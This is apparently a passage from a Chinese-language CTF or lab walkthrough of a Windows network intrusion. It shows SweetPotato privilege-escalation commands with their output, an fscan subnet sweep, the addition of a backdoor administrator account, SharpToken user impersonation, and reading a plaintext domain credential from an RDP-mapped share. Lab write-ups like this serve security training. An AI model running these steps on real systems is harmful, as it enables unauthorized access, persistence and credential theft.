C:/迅雷下载/SweetPotato.exe -a "dir C:\Users\Administrator\" C:/迅雷下载/SweetPotato.exe -a "dir C:\Users\Administrator\flag\" C:/迅雷下载/SweetPotato.exe -a "type C:\Users\Administrator\flag\flag01.txt"
C:/迅雷下载/SweetPotato.exe -a "C:\迅雷下载\fscan.exe -h 172.22.8.18/24" Modifying SweetPotato by Uknow to support webshell Github: https://github.com/uknowsec/SweetPotato SweetPotato by @_EthicalChaos_ Original RottenPotato code and exploit by @foxglovesec Weaponized JuicyPotato by @decoder_it and @Guitro along with BITS WinRM discovery PrintSpoofer discovery and original exploit by @itm4n
[+] Attempting NP impersonation using method PrintSpoofer to launch c:\Windows\System32\cmd.exe [+] Triggering notification on evil PIPE \\WIN-WEB/pipe/20cbde11-b9fd-41d3-b6f2-b42a5bb2829f [+] Server connected to our evil RPC pipe [+] Duplicated impersonation token ready for process creation [+] Intercepted and authenticated successfully, launching program [+] CreatePipe success [+] Command: "c:\Windows\System32\cmd.exe" /c C:\Ѹ������\fscan.exe -h 172.22.8.18/24 [+] Process with PID: 6976 created.
=====================================
start infoscan
(icmp) Target 172.22.8.18 is alive (icmp) Target 172.22.8.15 is alive (icmp) Target 172.22.8.31 is alive (icmp) Target 172.22.8.46 is alive
[*] Icmp alive hosts len is: 4
172.22.8.31:135 open 172.22.8.46:135 open 172.22.8.18:139 open 172.22.8.15:135 open 172.22.8.18:135 open 172.22.8.15:139 open 172.22.8.46:80 open 172.22.8.18:80 open 172.22.8.15:88 open 172.22.8.46:445 open 172.22.8.31:445 open 172.22.8.18:1433 open 172.22.8.15:445 open 172.22.8.18:445 open 172.22.8.46:139 open 172.22.8.31:139 open
C:/迅雷下载/SweetPotato.exe -a "net user test1 12SqweR!@ /add" C:/迅雷下载/SweetPotato.exe -a "net localgroup administrators test1 /add"
为了方便搞个bat
1 2 3 4 5 6 7 8 9 10 11 12 13
@echo off rem 设置 Java 8 的路径 SET JAVA8_JRE=C:\Program Files\Java\jdk1.8.0_201\jre\bin SET JAVA8_JDK=C:\Program Files\Java\jdk1.8.0_201\bin rem 临时修改 PATH,使 Java 8 的 JDK 和 JRE 生效 SETPATH=%JAVA8_JDK%;%JAVA8_JRE%;%PATH% rem 运行 JAR 文件 java -jar Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar rem 暂停以查看输出 pause
运行mstsc,进行远程连接,链接之后我们要拿John用户,用管理员身份打开cmd
1
SharpToken.exe execute "WIN-WEB\John" cmd true
执行不了,安装.NET3.5即可,搜索“服务器管理器”即可打开
服务器管理器–>管理–>添加角色1 和功能–>功能–>勾选.net3.5进行安装,安装好之后
1 2 3
net use dir \\TSCLIENT\C type \\TSCLIENT\C\credential.txt
得到了
1 2
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# Do you know how to hijack Image?